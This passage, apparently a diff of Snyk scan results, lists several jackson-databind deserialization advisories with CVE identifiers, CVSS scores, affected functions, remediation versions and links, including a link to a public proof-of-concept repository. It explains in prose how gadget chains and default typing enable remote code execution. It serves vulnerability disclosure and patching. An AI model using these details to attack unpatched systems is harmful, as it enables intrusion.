[CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: 